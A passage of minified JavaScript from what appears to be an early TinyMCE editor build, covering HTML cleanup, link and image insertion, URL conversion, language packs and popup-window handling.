element.innerHTML;if(on_save&&tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertFontsToSpans(doc);tinyMCE._customCleanup(inst,on_save?"get_from_editor_dom":"insert_to_editor_dom",doc.body);tinyMCE.cleanup_validElements=tinyMCE.settings['cleanup_validElements'];tinyMCE.cleanup_entities=tinyMCE.settings['cleanup_entities'];tinyMCE.cleanup_invalidElements=tinyMCE.settings['cleanup_invalidElements'];tinyMCE.cleanup_verify_html=tinyMCE.settings['verify_html'];tinyMCE.cleanup_force_br_newlines=tinyMCE.settings['force_br_newlines'];tinyMCE.cleanup_urlconverter_callback=tinyMCE.settings['urlconverter_callback'];tinyMCE.cleanup_verify_css_classes=tinyMCE.settings['verify_css_classes'];tinyMCE.cleanup_visual_table_class=tinyMCE.settings['visual_table_class'];tinyMCE.cleanup_apply_source_formatting=tinyMCE.settings['apply_source_formatting'];tinyMCE.cleanup_inline_styles=tinyMCE.settings['inline_styles'];tinyMCE.cleanup_visual_aid=visual;tinyMCE.cleanup_on_save=on_save;tinyMCE.cleanup_idCount=0;tinyMCE.cleanup_elementLookupTable=new Array();var startTime=new Date().getTime();if(tinyMCE.isMSIE){var nodes=element.getElementsByTagName("hr");for(var i=0;i<nodes.length;i++){if(nodes[i].id=="null")nodes[i].removeAttribute("id");}tinyMCE.setInnerHTML(element,tinyMCE.regexpReplace(element.innerHTML,'<p>[ \n\r]*<hr.*>[ \n\r]*</p>','<hr />','gi'));tinyMCE.setInnerHTML(element,tinyMCE.regexpReplace(element.innerHTML,'<!([^-(DOCTYPE)]* )|<!/[^-]*>','','gi'));}var html=this.cleanupNode(element);if(tinyMCE.settings['debug'])tinyMCE.debug("Cleanup process executed in: "+(new Date().getTime()-startTime)+" ms.");html=tinyMCE.regexpReplace(html,'<p><hr /></p>','<hr />');html=tinyMCE.regexpReplace(html,'<p> </p><hr /><p> </p>','<hr />');html=tinyMCE.regexpReplace(html,'<td>\\s*<br />\\s*</td>','<td> </td>');html=tinyMCE.regexpReplace(html,'<p>\\s*<br />\\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s* \\s*<br />\\s* \\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s* \\s*<br />\\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s*<br />\\s* \\s*</p>','<p> </p>');html=html.replace(new RegExp('<a>(.*?)</a>','gi'),'$1');if(!tinyMCE.isMSIE)html=html.replace(new RegExp('<o:p _moz-userdefined="" />','g'),"");if(tinyMCE.settings['remove_linebreaks'])html=html.replace(new RegExp('\r|\n','g'),' ');if(tinyMCE.getParam('apply_source_formatting')){html=html.replace(new RegExp('<(p|div)([^>]*)>','g'),"\n<$1$2>\n");html=html.replace(new RegExp('<\/(p|div)([^>]*)>','g'),"\n</$1$2>\n");html=html.replace(new RegExp('<br />','g'),"<br />\n");}if(tinyMCE.settings['force_br_newlines']){var re=new RegExp('<p> </p>','g');html=html.replace(re,"<br />");}if(tinyMCE.isGecko&&tinyMCE.settings['remove_lt_gt']){var re=new RegExp('<>','g');html=html.replace(re,"");}html=tinyMCE._customCleanup(inst,on_save?"get_from_editor":"insert_to_editor",html);var chk=tinyMCE.regexpReplace(html,"[ \t\r\n]","").toLowerCase();if(chk=="<br/>"||chk=="<br>"||chk=="<p> </p>"||chk=="<p> </p>"||chk=="<p></p>")html="";if(tinyMCE.settings["preformatted"])return "<pre>"+html+"</pre>";return html;};TinyMCE.prototype.insertLink=function(href,target,title,onclick,style_class){tinyMCE.execCommand('mceBeginUndoLevel');if(this.selectedInstance&&this.selectedElement&&this.selectedElement.nodeName.toLowerCase()=="img"){var doc=this.selectedInstance.getDoc();var linkElement=tinyMCE.getParentElement(this.selectedElement,"a");var newLink=false;if(!linkElement){linkElement=doc.createElement("a");newLink=true;}href=eval(tinyMCE.settings['urlconverter_callback']+"(href, linkElement);");tinyMCE.setAttrib(linkElement,'href',href);tinyMCE.setAttrib(linkElement,'target',target);tinyMCE.setAttrib(linkElement,'title',title);tinyMCE.setAttrib(linkElement,'onclick',onclick);tinyMCE.setAttrib(linkElement,'class',style_class);if(newLink){linkElement.appendChild(this.selectedElement.cloneNode(true));this.selectedElement.parentNode.replaceChild(linkElement,this.selectedElement);}return;}if(!this.linkElement&&this.selectedInstance){if(tinyMCE.isSafari){tinyMCE.execCommand("mceInsertContent",false,'<a href="'+tinyMCE.uniqueURL+'">'+this.selectedInstance.getSelectedHTML()+'</a>');}else this.selectedInstance.contentDocument.execCommand("createlink",false,tinyMCE.uniqueURL);tinyMCE.linkElement=this.getElementByAttributeValue(this.selectedInstance.contentDocument.body,"a","href",tinyMCE.uniqueURL);var elementArray=this.getElementsByAttributeValue(this.selectedInstance.contentDocument.body,"a","href",tinyMCE.uniqueURL);for(var i=0;i<elementArray.length;i++){href=eval(tinyMCE.settings['urlconverter_callback']+"(href, elementArray[i]);");tinyMCE.setAttrib(elementArray[i],'href',href);tinyMCE.setAttrib(elementArray[i],'mce_real_href',href);tinyMCE.setAttrib(elementArray[i],'target',target);tinyMCE.setAttrib(elementArray[i],'title',title);tinyMCE.setAttrib(elementArray[i],'onclick',onclick);tinyMCE.setAttrib(elementArray[i],'class',style_class);}tinyMCE.linkElement=elementArray[0];}if(this.linkElement){href=eval(tinyMCE.settings['urlconverter_callback']+"(href, this.linkElement);");tinyMCE.setAttrib(this.linkElement,'href',href);tinyMCE.setAttrib(this.linkElement,'mce_real_href',href);tinyMCE.setAttrib(this.linkElement,'target',target);tinyMCE.setAttrib(this.linkElement,'title',title);tinyMCE.setAttrib(this.linkElement,'onclick',onclick);tinyMCE.setAttrib(this.linkElement,'class',style_class);}tinyMCE.execCommand('mceEndUndoLevel');};TinyMCE.prototype.insertImage=function(src,alt,border,hspace,vspace,width,height,align,title,onmouseover,onmouseout){tinyMCE.execCommand('mceBeginUndoLevel');if(src=="")return;if(!this.imgElement&&tinyMCE.isSafari){var html="";html+='<img src="'+src+'" alt="'+alt+'"';html+=' border="'+border+'" hspace="'+hspace+'"';html+=' vspace="'+vspace+'" width="'+width+'"';html+=' height="'+height+'" align="'+align+'" title="'+title+'" onmouseover="'+onmouseover+'" onmouseout="'+onmouseout+'" />';tinyMCE.execCommand("mceInsertContent",false,html);}else{if(!this.imgElement&&this.selectedInstance){if(tinyMCE.isSafari)tinyMCE.execCommand("mceInsertContent",false,'<img src="'+tinyMCE.uniqueURL+'" />');else this.selectedInstance.contentDocument.execCommand("insertimage",false,tinyMCE.uniqueURL);tinyMCE.imgElement=this.getElementByAttributeValue(this.selectedInstance.contentDocument.body,"img","src",tinyMCE.uniqueURL);}}if(this.imgElement){var needsRepaint=false;src=eval(tinyMCE.settings['urlconverter_callback']+"(src, tinyMCE.imgElement);");if(onmouseover&&onmouseover!="")onmouseover="this.src='"+eval(tinyMCE.settings['urlconverter_callback']+"(onmouseover, tinyMCE.imgElement);")+"';";if(onmouseout&&onmouseout!="")onmouseout="this.src='"+eval(tinyMCE.settings['urlconverter_callback']+"(onmouseout, tinyMCE.imgElement);")+"';";if(typeof(title)=="undefined")title=alt;if(width!=this.imgElement.getAttribute("width")||height!=this.imgElement.getAttribute("height")||align!=this.imgElement.getAttribute("align"))needsRepaint=true;tinyMCE.setAttrib(this.imgElement,'src',src);tinyMCE.setAttrib(this.imgElement,'mce_real_src',src);tinyMCE.setAttrib(this.imgElement,'alt',alt);tinyMCE.setAttrib(this.imgElement,'title',title);tinyMCE.setAttrib(this.imgElement,'align',align);tinyMCE.setAttrib(this.imgElement,'border',border,true);tinyMCE.setAttrib(this.imgElement,'hspace',hspace,true);tinyMCE.setAttrib(this.imgElement,'vspace',vspace,true);tinyMCE.setAttrib(this.imgElement,'width',width,true);tinyMCE.setAttrib(this.imgElement,'height',height,true);tinyMCE.setAttrib(this.imgElement,'onmouseover',onmouseover);tinyMCE.setAttrib(this.imgElement,'onmouseout',onmouseout);if(width&&width!="")this.imgElement.style.pixelWidth=width;if(height&&height!="")this.imgElement.style.pixelHeight=height;if(needsRepaint)tinyMCE.selectedInstance.repaint();}tinyMCE.execCommand('mceEndUndoLevel');};TinyMCE.prototype.getElementByAttributeValue=function(node,element_name,attrib,value){var elements=this.getElementsByAttributeValue(node,element_name,attrib,value);if(elements.length==0)return null;return elements[0];};TinyMCE.prototype.getElementsByAttributeValue=function(node,element_name,attrib,value){var elements=new Array();if(node&&node.nodeName.toLowerCase()==element_name){if(node.getAttribute(attrib)&&node.getAttribute(attrib).indexOf(value)!=-1)elements[elements.length]=node;}if(node&&node.hasChildNodes()){for(var x=0,n=node.childNodes.length;x<n;x++){var childElements=this.getElementsByAttributeValue(node.childNodes[x],element_name,attrib,value);for(var i=0,m=childElements.length;i<m;i++)elements[elements.length]=childElements[i];}}return elements;};TinyMCE.prototype.isBlockElement=function(node){return node!=null&&node.nodeType==1&&this.blockRegExp.test(node.nodeName);};TinyMCE.prototype.getParentBlockElement=function(node){while(node){if(this.blockRegExp.test(node.nodeName))return node;node=node.parentNode;}return null;};TinyMCE.prototype.getNodeTree=function(node,node_array,type,node_name){if(typeof(type)=="undefined"||node.nodeType==type&&(typeof(node_name)=="undefined"||node.nodeName==node_name))node_array[node_array.length]=node;if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)tinyMCE.getNodeTree(node.childNodes[i],node_array,type,node_name);}return node_array;};TinyMCE.prototype.getParentElement=function(node,names,attrib_name,attrib_value){if(typeof(names)=="undefined"){if(node.nodeType==1)return node;while((node=node.parentNode)!=null&&node.nodeType!=1);return node;}var namesAr=names.split(',');if(node==null)return null;do{for(var i=0;i<namesAr.length;i++){if(node.nodeName.toLowerCase()==namesAr[i].toLowerCase()||names=="*"){if(typeof(attrib_name)=="undefined")return node;else if(node.getAttribute(attrib_name)){if(typeof(attrib_value)=="undefined"){if(node.getAttribute(attrib_name)!="")return node;}else if(node.getAttribute(attrib_name)==attrib_value)return node;}}}}while((node=node.parentNode)!=null);return null;};TinyMCE.prototype.convertURL=function(url,node,on_save){var prot=document.location.protocol;var host=document.location.hostname;var port=document.location.port;var fileProto=(prot=="file:");url=tinyMCE.regexpReplace(url,'(http|https):///','/');if(url.indexOf('mailto:')!=-1||url.indexOf('javascript:')!=-1||tinyMCE.regexpReplace(url,'[ \t\r\n\+]|%20','').charAt(0)=="#")return url;if(!tinyMCE.isMSIE&&!on_save&&url.indexOf("://")==-1&&url.charAt(0)!='/')return tinyMCE.settings['base_href']+url;if(!tinyMCE.getParam('relative_urls')){var urlParts=tinyMCE.parseURL(url);var baseUrlParts=tinyMCE.parseURL(tinyMCE.settings['base_href']);if(urlParts['anchor']&&urlParts['path']==baseUrlParts['path'])return "#"+urlParts['anchor'];}if(on_save&&tinyMCE.getParam('relative_urls')){var urlParts=tinyMCE.parseURL(url);var tmpUrlParts=tinyMCE.parseURL(tinyMCE.settings['document_base_url']);if(urlParts['host']==tmpUrlParts['host']&&(!urlParts['port']||urlParts['port']==tmpUrlParts['port']))return tinyMCE.convertAbsoluteURLToRelativeURL(tinyMCE.settings['document_base_url'],url);}if(!fileProto&&tinyMCE.getParam('remove_script_host')){var start="",portPart="";if(port!="")portPart=":"+port;start=prot+"//"+host+portPart+"/";if(url.indexOf(start)==0)url=url.substring(start.length-1);if(!tinyMCE.getParam('relative_urls')&&url.indexOf('://')==-1&&url.charAt(0)!='/')url='/'+url;}return url;};TinyMCE.prototype.parseURL=function(url_str){var urlParts=new Array();if(url_str){var pos,lastPos;pos=url_str.indexOf('://');if(pos!=-1){urlParts['protocol']=url_str.substring(0,pos);lastPos=pos+3;}for(var i=lastPos;i<url_str.length;i++){var chr=url_str.charAt(i);if(chr==':')break;if(chr=='/')break;}pos=i;urlParts['host']=url_str.substring(lastPos,pos);lastPos=pos;if(url_str.charAt(pos)==':'){pos=url_str.indexOf('/',lastPos);urlParts['port']=url_str.substring(lastPos+1,pos);}lastPos=pos;pos=url_str.indexOf('?',lastPos);if(pos==-1)pos=url_str.indexOf('#',lastPos);if(pos==-1)pos=url_str.length;urlParts['path']=url_str.substring(lastPos,pos);lastPos=pos;if(url_str.charAt(pos)=='?'){pos=url_str.indexOf('#');pos=(pos==-1)?url_str.length:pos;urlParts['query']=url_str.substring(lastPos+1,pos);}lastPos=pos;if(url_str.charAt(pos)=='#'){pos=url_str.length;urlParts['anchor']=url_str.substring(lastPos+1,pos);}}return urlParts;};TinyMCE.prototype.serializeURL=function(up){var url="";if(up['protocol'])url+=up['protocol']+"://";if(up['host'])url+=up['host'];if(up['port'])url+=":"+up['port'];if(up['path'])url+=up['path'];if(up['query'])url+="?"+up['query'];if(up['anchor'])url+="#"+up['anchor'];return url;};TinyMCE.prototype.convertAbsoluteURLToRelativeURL=function(base_url,url_to_relative){var baseURL=this.parseURL(base_url);var targetURL=this.parseURL(url_to_relative);var strTok1;var strTok2;var breakPoint=0;var outPath="";var forceSlash=false;if(targetURL.path=="")targetURL.path="/";else forceSlash=true;base_url=baseURL.path.substring(0,baseURL.path.lastIndexOf('/'));strTok1=base_url.split('/');strTok2=targetURL.path.split('/');if(strTok1.length>=strTok2.length){for(var i=0;i<strTok1.length;i++){if(i>=strTok2.length||strTok1[i]!=strTok2[i]){breakPoint=i+1;break;}}}if(strTok1.length<strTok2.length){for(var i=0;i<strTok2.length;i++){if(i>=strTok1.length||strTok1[i]!=strTok2[i]){breakPoint=i+1;break;}}}if(breakPoint==1)return targetURL.path;for(var i=0;i<(strTok1.length-(breakPoint-1));i++)outPath+="../";for(var i=breakPoint-1;i<strTok2.length;i++){if(i!=(breakPoint-1))outPath+="/"+strTok2[i];else outPath+=strTok2[i];}targetURL.protocol=null;targetURL.host=null;targetURL.port=null;targetURL.path=outPath==""&&forceSlash?"/":outPath;return this.serializeURL(targetURL);};TinyMCE.prototype.convertRelativeToAbsoluteURL=function(base_url,relative_url){var baseURL=TinyMCE.prototype.parseURL(base_url);var relURL=TinyMCE.prototype.parseURL(relative_url);if(relative_url==""||relative_url.charAt(0)=='/'||relative_url.indexOf('://')!=-1||relative_url.indexOf('mailto:')!=-1||relative_url.indexOf('javascript:')!=-1)return relative_url;baseURLParts=baseURL['path'].split('/');relURLParts=relURL['path'].split('/');var newBaseURLParts=new Array();for(var i=baseURLParts.length-1;i>=0;i--){if(baseURLParts[i].length==0)continue;newBaseURLParts[newBaseURLParts.length]=baseURLParts[i];}baseURLParts=newBaseURLParts.reverse();var newRelURLParts=new Array();var numBack=0;for(var i=relURLParts.length-1;i>=0;i--){if(relURLParts[i].length==0||relURLParts[i]==".")continue;if(relURLParts[i]=='..'){numBack++;continue;}if(numBack>0){numBack--;continue;}newRelURLParts[newRelURLParts.length]=relURLParts[i];}relURLParts=newRelURLParts.reverse();var len=baseURLParts.length-numBack;var absPath=(len<=0?"":"/")+baseURLParts.slice(0,len).join('/')+"/"+relURLParts.join('/');var start="",end="";relURL.protocol=baseURL.protocol;relURL.host=baseURL.host;relURL.port=baseURL.port;if(relURL.path.charAt(relURL.path.length-1)=="/")absPath+="/";relURL.path=absPath;return TinyMCE.prototype.serializeURL(relURL);};TinyMCE.prototype.getParam=function(name,default_value,strip_whitespace,split_chr){var value=(typeof(this.settings[name])=="undefined")?default_value:this.settings[name];if(value=="true"||value=="false")return(value=="true");if(strip_whitespace)value=tinyMCE.regexpReplace(value,"[ \t\r\n]","");if(typeof(split_chr)!="undefined"&&split_chr!=null){value=value.split(split_chr);var outArray=new Array();for(var i=0;i<value.length;i++){if(value[i]&&value[i]!="")outArray[outArray.length]=value[i];}value=outArray;}return value;};TinyMCE.prototype.getLang=function(name,default_value,parse_entities){var value=(typeof(tinyMCELang[name])=="undefined")?default_value:tinyMCELang[name];if(parse_entities){var el=document.createElement("div");el.innerHTML=value;value=el.innerHTML;}return value;};TinyMCE.prototype.addToLang=function(prefix,ar){for(var key in ar){if(typeof(ar[key])=='function')continue;tinyMCELang[(key.indexOf('lang_')==-1?'lang_':'')+(prefix!=''?(prefix+"_"):'')+key]=ar[key];}};TinyMCE.prototype.replaceVar=function(replace_haystack,replace_var,replace_str){var re=new RegExp('{\\\$'+replace_var+'}','g');return replace_haystack.replace(re,replace_str);};TinyMCE.prototype.replaceVars=function(replace_haystack,replace_vars){for(var key in replace_vars){var value=replace_vars[key];if(typeof(value)=='function')continue;replace_haystack=tinyMCE.replaceVar(replace_haystack,key,value);}return replace_haystack;};TinyMCE.prototype.triggerNodeChange=function(focus,setup_content){if(tinyMCE.settings['handleNodeChangeCallback']){if(tinyMCE.selectedInstance){var inst=tinyMCE.selectedInstance;var editorId=inst.editorId;var elm=(typeof(setup_content)!="undefined"&&setup_content)?tinyMCE.selectedElement:inst.getFocusElement();var undoIndex=-1;var undoLevels=-1;var anySelection=false;var selectedText=inst.getSelectedText();if(tinyMCE.settings["auto_resize"]){var doc=inst.getDoc();inst.iframeElement.style.width=doc.body.offsetWidth+"px";inst.iframeElement.style.height=doc.body.offsetHeight+"px";}if(tinyMCE.selectedElement)anySelection=(tinyMCE.selectedElement.nodeName.toLowerCase()=="img")||(selectedText&&selectedText.length>0);if(tinyMCE.settings['custom_undo_redo']){undoIndex=inst.undoIndex;undoLevels=inst.undoLevels.length;}tinyMCE.executeCallback('handleNodeChangeCallback','_handleNodeChange',0,editorId,elm,undoIndex,undoLevels,inst.visualAid,anySelection,setup_content);}}if(this.selectedInstance&&(typeof(focus)=="undefined"||focus))this.selectedInstance.contentWindow.focus();};TinyMCE.prototype._customCleanup=function(inst,type,content){var customCleanup=tinyMCE.settings['cleanup_callback'];if(customCleanup!=""&&eval("typeof("+customCleanup+")")!="undefined")content=eval(customCleanup+"(type, content, inst);");var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){if(eval("typeof(TinyMCE_"+plugins[i]+"_cleanup)")!="undefined")content=eval("TinyMCE_"+plugins[i]+"_cleanup(type, content, inst);");}return content;};TinyMCE.prototype.getContent=function(editor_id){if(typeof(editor_id)!="undefined")tinyMCE.selectedInstance=tinyMCE.getInstanceById(editor_id);if(tinyMCE.selectedInstance){var old=this.selectedInstance.getBody().innerHTML;var html=tinyMCE._cleanupHTML(this.selectedInstance,this.selectedInstance.getDoc(),tinyMCE.settings,this.selectedInstance.getBody(),false,true);tinyMCE.setInnerHTML(this.selectedInstance.getBody(),old);return html;}return null;};TinyMCE.prototype.setContent=function(html_content){if(tinyMCE.selectedInstance){tinyMCE.selectedInstance.execCommand('mceSetContent',false,html_content);tinyMCE.selectedInstance.repaint();}};TinyMCE.prototype.importThemeLanguagePack=function(name){if(typeof(name)=="undefined")name=tinyMCE.settings['theme'];tinyMCE.loadScript(tinyMCE.baseURL+'/themes/'+name+'/langs/'+tinyMCE.settings['language']+'.js');};TinyMCE.prototype.importPluginLanguagePack=function(name,valid_languages){var lang="en";valid_languages=valid_languages.split(',');for(var i=0;i<valid_languages.length;i++){if(tinyMCE.settings['language']==valid_languages[i])lang=tinyMCE.settings['language'];}tinyMCE.loadScript(tinyMCE.baseURL+'/plugins/'+name+'/langs/'+lang+'.js');};TinyMCE.prototype.applyTemplate=function(html,args){html=tinyMCE.replaceVar(html,"themeurl",tinyMCE.themeURL);if(typeof(args)!="undefined")html=tinyMCE.replaceVars(html,args);html=tinyMCE.replaceVars(html,tinyMCE.settings);html=tinyMCE.replaceVars(html,tinyMCELang);return html;};TinyMCE.prototype.openWindow=function(template,args){var html,width,height,x,y,resizable,scrollbars,url;args['mce_template_file']=template['file'];args['mce_width']=template['width'];args['mce_height']=template['height'];tinyMCE.windowArgs=args;html=template['html'];if(!(width=parseInt(template['width'])))width=320;if(!(height=parseInt(template['height'])))height=200;if(tinyMCE.isMSIE)height+=40;else height+=20;x=parseInt(screen.width/2.0)-(width/2.0);y=parseInt(screen.height/2.0)-(height/2.0);resizable=(args&&args['resizable'])?args['resizable']:"no";scrollbars=(args&&args['scrollbars'])?args['scrollbars']:"no";if(template['file'].charAt(0)!='/'&&template['file'].indexOf('://')==-1)url=tinyMCE.baseURL+"/themes/"+tinyMCE.getParam("theme")+"/"+template['file'];else url=template['file'];for(var name in args){if(typeof(args[name])=='function')continue;url=tinyMCE.replaceVar(url,name,escape(args[name]));}if(html){html=tinyMCE.replaceVar(html,"css",this.settings['popups_css']);html=tinyMCE.applyTemplate(html,args);var win=window.open("","mcePopup"+new Date().getTime(),"top="+y+",left="+x+",scrollbars="+scrollbars+",dialog=yes,minimizable="+resizable+",modal=yes,width="+width+",height="+height+",resizable="+resizable);if(win==null){alert(tinyMCELang['lang_popup_blocked']);return;}win.document.write(html);win.document.close();win.resizeTo(width,height);win.focus();}else{if(tinyMCE.isMSIE&&resizable!='yes'&&tinyMCE.settings["dialog_type"]=="modal"){var features="resizable:"+resizable+";scroll:"+scrollbars+";status:yes;center:yes;help:no;dialogWidth:"+width+"px;dialogHeight:"+height+"px;";window.showModalDialog(url,window,features);}else{var modal=(resizable=="yes")?"no":"yes";if(tinyMCE.isGecko&&tinyMCE.isMac)modal="no";if(template['close_previous']!="no")try{tinyMCE.lastWindow.close();}catch(ex){}var win=window.open(url,"mcePopup"+new Date().getTime(),"top="+y+",left="+x+",scrollbars="+scrollbars+",dialog="+modal+",minimizable="+resizable+",modal="+modal+",width="+width+",height="+height+",resizable="+resizable);if(win==null){alert(tinyMCELang['lang_popup_blocked']);return;}if(template['close_previous']!="no")tinyMCE.lastWindow=win;eval('try { win.resizeTo(width, height); } catch(e) { }');if(tinyMCE.isGecko){if(win.document.defaultView.statusbar.visible)win.resizeBy(0,tinyMCE.isMac?10:24);}win.focus();}}};TinyMCE.prototype.closeWindow=function(win){win.close();};TinyMCE.prototype.getVisualAidClass=function(class_name,state){var aidClass=tinyMCE.settings['visual_table_class'];if(typeof(state)=="undefined")state=tinyMCE.settings['visual'];var classNames=new Array();var ar=class_name.split(' ');for(var i=0;i<ar.length;i++){if(ar[i]==aidClass)ar[i]="";if(ar[i]!="")classNames[classNames.length]=ar[i];}if(state)classNames[classNames.length]=aidClass;var className="";for(var i=0;i<classNames.length;i++){if(i>0)className+=" ";className+=classNames[i];}return className;};TinyMCE.prototype.handleVisualAid=function(el,deep,state,inst){if(!el)return;var tableElement=null;switch(el.nodeName){case "TABLE":var oldW=el.style.width;var oldH=el.style.height;var bo=tinyMCE.getAttrib(el,"border");bo=bo==""||bo=="0"?true:false;tinyMCE.setAttrib(el,"class",tinyMCE.getVisualAidClass(tinyMCE.getAttrib(el,"class"),state&&bo));el.style.width=oldW;el.style.height=oldH;for(var y=0;y<el.rows.length;y++){for(var x=0;x<el.rows[y].cells.length;x++){var cn=tinyMCE.getVisualAidClass(tinyMCE.getAttrib(el.rows[y].cells[x],"class"),state&&bo);tinyMCE.setAttrib(el.rows[y].cells[x],"class",cn);}}break;case "A":var anchorName=tinyMCE.getAttrib(el,"name");if(anchorName!=''&&state){el.title=anchorName;el.className='mceItemAnchor';}else if(anchorName!=''&&!state)el.className='';break;}if(deep&&el.hasChildNodes()){for(var i=0;i<el.childNodes.length;i++)tinyMCE.handleVisualAid(el.childNodes[i],deep,state,inst);}};TinyMCE.prototype.getAttrib=function(elm,name,default_value){if(typeof(default_value)=="undefined")default_value="";if(!elm||elm.nodeType!=1)return default_value;var v=elm.getAttribute(name);if(name=="class"&&!v)v=elm.className;if(name=="style"&&!tinyMCE.isOpera)v=elm.style.cssText;return(v&&v!="")?v:default_value;};TinyMCE.prototype.setAttrib=function(element,name,value,fix_value){if(typeof(value)=="number"&&value!=null)value=""+value;if(fix_value){if(value==null)value="";var re=new RegExp('[^0-9%]','g');value=value.replace(re,'');}if(name=="style")element.style.cssText=value;if(name=="class")element.className=value;if(value!=null&&value!=""&&value!=-1)element.setAttribute(name,value);else element.removeAttribute(name);};TinyMCE.prototype.setStyleAttrib=function(elm,name,value){eval('elm.style.'+name+'=value;');if(tinyMCE.isMSIE&&value==null||value==''){var str=tinyMCE.serializeStyle(tinyMCE.parseStyle(elm.style.cssText));elm.style.cssText=str;elm.setAttribute("style",str);}};TinyMCE.prototype.convertSpansToFonts=function(doc){var sizes=tinyMCE.getParam('font_size_style_values').replace(/\s+/,'').split(',');var h=doc.body.innerHTML;h=h.replace(/<span/gi,'<font');h=h.replace(/<\/span/gi,'</font');doc.body.innerHTML=h;var s=doc.getElementsByTagName("font");for(var i=0;i<s.length;i++){var size=tinyMCE.trim(s[i].style.fontSize).toLowerCase();var fSize=0;for(var x=0;x<sizes.length;x++){if(sizes[x]==size){fSize=x+1;break;}}if(fSize>0){tinyMCE.setAttrib(s[i],'size',fSize);s[i].style.fontSize='';}var fFace=s[i].style.fontFamily;if(fFace!=null&&fFace!=""){tinyMCE.setAttrib(s[i],'face',fFace);s[i].style.fontFamily='';}var fColor=s[i].style.color;if(fColor!=null&&fColor!=""){tinyMCE.setAttrib(s[i],'color',tinyMCE.convertRGBToHex(fColor));s[i].style.color='';}}};TinyMCE.prototype.convertFontsToSpans=function(doc){var sizes=tinyMCE.getParam('font_size_style_values').replace(/\s+/,'').split(',');var h=doc.body.innerHTML;h=h.replace(/<font/gi,'<span');h=h.replace(/<\/font/gi,'</span');doc.body.innerHTML=h;var fsClasses=tinyMCE.getParam('font_size_classes');if(fsClasses!='')fsClasses=fsClasses.replace(/\s+/,'').split(',');else fsClasses=null;var s=doc.getElementsByTagName("span");for(var i=0;i<s.length;i++){var fSize,fFace,fColor;fSize=tinyMCE.getAttrib(s[i],'size');fFace=tinyMCE.getAttrib(s[i],'face');fColor=tinyMCE.getAttrib(s[i],'color');if(fSize!=""){fSize=parseInt(fSize);if(fSize>0&&fSize<8){if(fsClasses!=null)tinyMCE.setAttrib(s[i],'class',fsClasses[fSize-1]);else s[i].style.fontSize=sizes[fSize-1];}s[i].removeAttribute('size');}if(fFace!=""){s[i].style.fontFamily=fFace;s[i].removeAttribute('face');}if(fColor!=""){s[i].style.color=fColor;s[i].removeAttribute('color');}}};TinyMCE.prototype.setInnerHTML=function(e,h){if(tinyMCE.isMSIE&&!tinyMCE.isOpera){e.innerHTML='<div id="mceTMPElement" style="display: none">TMP</div>'+h;e.firstChild.removeNode(true);}else e.innerHTML=h;};TinyMCE.prototype.getOuterHTML=function(e){if(tinyMCE.isMSIE)return e.outerHTML;var d=e.ownerDocument.createElement("body");d.appendChild(e);return d.innerHTML;};TinyMCE.prototype.setOuterHTML=function(doc,e,h){if(tinyMCE.isMSIE){e.outerHTML=h;return;}var d=e.ownerDocument.createElement("body");d.innerHTML=h;e.parentNode.replaceChild(d.firstChild,e);};TinyMCE.prototype.insertAfter=function(nc,rc){if(rc.nextSibling)rc.parentNode.insertBefore(nc,rc.nextSibling);else rc.parentNode.appendChild(nc);};TinyMCE.prototype.cleanupAnchors=function(doc){var an=doc.getElementsByTagName("a");for(var i=0;i<an.length;i++){if(tinyMCE.getAttrib(an[i],"name")!=""){var cn=an[i].childNodes;for(var x=cn.length-1;x>=0;x--)tinyMCE.insertAfter(cn[x],an[i]);}}};TinyMCE.prototype._setHTML=function(doc,html_content){html_content=tinyMCE.cleanupHTMLCode(html_content);try{tinyMCE.setInnerHTML(doc.body,html_content);}catch(e){if(this.isMSIE)doc.body.createTextRange().pasteHTML(html_content);}if(tinyMCE.isMSIE&&tinyMCE.settings['fix_content_duplication']){var paras=doc.getElementsByTagName("P");for(var i=0;i<paras.length;i++){var node=paras[i];while((node=node.parentNode)!=null){if(node.nodeName.toLowerCase()=="p")node.outerHTML=node.innerHTML;}}var html=doc.body.innerHTML;if(html.indexOf('="mso')!=-1){for(var i=0;i<doc.body.all.length;i++){var el=doc.body.all[i];el.removeAttribute("className","",0);el.removeAttribute("style","",0);}html=doc.body.innerHTML;html=tinyMCE.regexpReplace(html,"<o:p><\/o:p>","<br />");html=tinyMCE.regexpReplace(html,"<o:p> <\/o:p>","");html=tinyMCE.regexpReplace(html,"<st1:.*?>","");html=tinyMCE.regexpReplace(html,"<p><\/p>","");html=tinyMCE.regexpReplace(html,"<p><\/p>\r\n<p><\/p>","");html=tinyMCE.regexpReplace(html,"<p> <\/p>","<br />");html=tinyMCE.regexpReplace(html,"<p>\s*(<p>\s*)?","<p>");html=tinyMCE.regexpReplace(html,"<\/p>\s*(<\/p>\s*)?","</p>");}tinyMCE.setInnerHTML(doc.body,html);}tinyMCE.cleanupAnchors(doc);if(tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertSpansToFonts(doc);};TinyMCE.prototype.getImageSrc=function(str){var pos=-1;if(!str)return "";if((pos=str.indexOf('this.src='))!=-1){var src=str.substring(pos+10);src=src.substring(0,src.indexOf('\''));return src;}return "";};TinyMCE.prototype._getElementById=function(element_id){var elm=document.getElementById(element_id);if(!elm){for(var j=0;j<document.forms.length;j++){for(var k=0;k<document.forms[j].elements.length;k++){if(document.forms[j].elements[k].name==element_id){elm=document.forms[j].elements[k];break;}}}}return elm;};TinyMCE.prototype.getEditorId=function(form_element){var inst=this.getInstanceById(form_element);if(!inst)return null;return inst.editorId;};TinyMCE.prototype.getInstanceById=function(editor_id){var inst=this.instances[editor_id];if(!inst){for(var n in tinyMCE.instances){var instance=tinyMCE.instances[n];if(!tinyMCE.isInstance(instance))continue;if(instance.formTargetElementId==editor_id){inst=instance;break;}}}return inst;};TinyMCE.prototype.queryInstanceCommandValue=function(editor_id,command){var inst=tinyMCE.getInstanceById(editor_id);if(inst)return inst.queryCommandValue(command);return false;};TinyMCE.prototype.queryInstanceCommandState=function(editor_id,command){var inst=tinyMCE.getInstanceById(editor_id);if(inst)return inst.queryCommandState(command);return 